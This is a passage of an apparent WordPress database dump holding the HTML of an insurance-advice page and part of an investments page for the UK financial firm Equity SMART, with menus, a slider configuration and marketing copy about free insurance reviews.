href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-32 current_page_item menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_32_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:350px;\">&#13;\n					<div id=\"rev_slider_32_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:350px;height:350;\">						&#13;\n										<ul><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n						&#13;\n														<div class=\"tp-caption fade\" data-x=\"333\" data-y=\"68\" data-speed=\"0\" data-start=\"0\" data-easing=\"easeOutExpo\">					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption big_black fade\" data-x=\"58\" data-y=\"53\" data-speed=\"1250\" data-start=\"0\" data-easing=\"easeOutExpo\">Insurance Protection					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption black fade\" data-x=\"61\" data-y=\"100\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\">It\'s more than getting a free quote on the internet.<br/> It’s about real people – you and those important<br/>&#13;\nto you (it also needs a bit of thinking…)   					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption alt1 sfb\" data-x=\"61\" data-y=\"166\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\"><a href=\"../contact-us/\" class=\"button large green\">Click For Advice</a>					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi32;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_32_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_32_1\');\r\n				else\r\n				   revapi32 = tpj(\'#rev_slider_32_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:960,\r\n						startheight:350,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-32\" class=\"post-32 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Insurance Protection</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 12th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"one_half\"><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>21st Century Insurance to Meet 21st Centaury Problems</h2><p/>&#13;\n<p>The world is a different place to what it once was, and it is changing day by day for all of us. Improvements in healthcare, diet and living conditions mean we are now living longer than ever before.</p>&#13;\n<p><b>So surely that’s a good thing, right?</b> In the main – yes it is! It means we’re around longer to see our families grow and flourish, to make the most of life and to enjoy all that it has to offer.</p>&#13;\n<p>But it’s much more complex than that. By living longer, it means our lives are no longer black and white. New complications are emerging. The 21<sup>st</sup> Century may bring new benefits, but it also brings new problems. Some of the forms of critical illness covers drawn together in the 20<sup>th</sup> Century are no longer relevant to life today.</p>&#13;\n<p>Thanks to our Insurance Review, we can make your life simpler. You’ll know exactly what the best choices are and how to make them to ensure a the best cover at the most economical cost.</p>&#13;\n<p>Simply request your <b>FREE</b> Insurance Review with a Equity SMART protection expert today by clicking on the get a insurance review button to get started.</p>&#13;\n<p/></section></div></div><div class=\"one_half last\"> <div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>What You Can Expect From Us.</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Don’t Get Tied Down – We provide quotes from the entire market, are not tied to any one company or restrictive panels so you can rest easy with more choice</li>&#13;\n<li>Right Product – We know all the small print through proper analysis of all insurer plans open to you and matched to your needs and objectives.</li>&#13;\n<li>Regulated – To give you no pressure advice on new plan and review current ones and protect you from being mis-sold a financial product<b> </b></li>&#13;\n<li>Cost effective – you save on your premiums through our advice based discounts and all the best cover options to suit every budget</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o years established - that counts </a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value.&#13;\n<p>If you become a client of Equity SMART, you will benefit. If you leave only with our knowledge you will still be better off. Simple.</p>&#13;\n<p>Much of what we say is common sense, very little of what we do is common practice.  We provide professional advice with discounted insurance premiums.</p>&#13;\n<p>Leaving you more money in your pocket today, without sacrificing on the level of cover put in place for tomorrow.</p></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Who Will Benefit From Our Advice:</a></h5><div class=\"toggle-content \" style=\"\">&#13;\n<p style=\"text-align: left;\" align=\"center\">Our clients are individuals, their families, the self employed and small to medium sized businesses<b/></p>&#13;\n<p>We care. We know our advice can have a huge impact on you and your family – that’s why only by putting <b><i>advice before products and value before price</i></b> will do.</p>&#13;\n<p>Trust is a precious commodity, and one that we need to earn from you. Once we have it, we’ll never break it.</p>&#13;\n<p/></div></div>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Get Your Pension Review</a></div><div class=\"clearboth\"/>&#13;\n<p style=\"text-align: center;\"><big><big><big>Insurance Protection Planning</big></big></big></p>&#13;\n<p style=\"text-align: center;\">Select the area of insurance planning if you have a specific area you are interested in:</p>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-1.imageframe{float:left;}\r\n	#imageframe-1.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-1.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-1.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-1\" class=\"imageframe imageframe-none\"><a href=\"../life-insurance/\" target=\"_blank\"/></span>&#13;\n<h2>Life Insurance</h2>&#13;\n<p>Enabling you to care for and protect your loved ones even after you’ve <a href=\"../life-insurance/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-2.imageframe{float:left;}\r\n	#imageframe-2.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-2.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-2.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-2\" class=\"imageframe imageframe-none\"><a href=\"../critical-illness-insurance-2-0/\" target=\"_blank\"/></span>&#13;\n<h2>Critical illness Insurance</h2>&#13;\n<p>The right serious illness plan avoids critical financial problems for your family <a href=\"../critical-illness-insurance-2-0/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third last\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-3.imageframe{float:left;}\r\n	#imageframe-3.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-3.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-3.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-3\" class=\"imageframe imageframe-none\"><a href=\"../business-protection-insurance/\"/></span>&#13;\n<h2>Business Protection</h2>&#13;\n<p>Your key people are your business. Protect them, and watch your business <a href=\"../business-protection-insurance/\">…find out more…</a></p>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>It’s all so simple. To book a chat with our independent financial advisors.</h2><p>It\'s free, without obligation and impartial click the link or call free on .</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Insurance Protection - Expert Advice From Equity SMART','We provide expert advice on all aspects of personal and family protection, to better protect you and your family. More insurance protection advice here.','publish','closed','closed','','insurance-protection-expert-advice-from-equity-smart','','','2017-09-21 16:34:33','2017-09-21 16:34:33','',0,'http://www.equalitywalk.org.uk/insurance-protection-expert-advice-from-equity-smart',0,'page','',0),(75,1,'2017-09-21 16:34:33','2017-09-21 16:34:33','<body class=\"page page-id-28 page-parent page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-28 current_page_item menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; 